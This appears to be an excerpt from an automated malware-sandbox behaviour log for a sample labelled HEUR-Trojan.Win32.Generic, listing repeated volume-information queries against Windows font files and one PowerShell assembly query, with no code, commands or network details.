Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
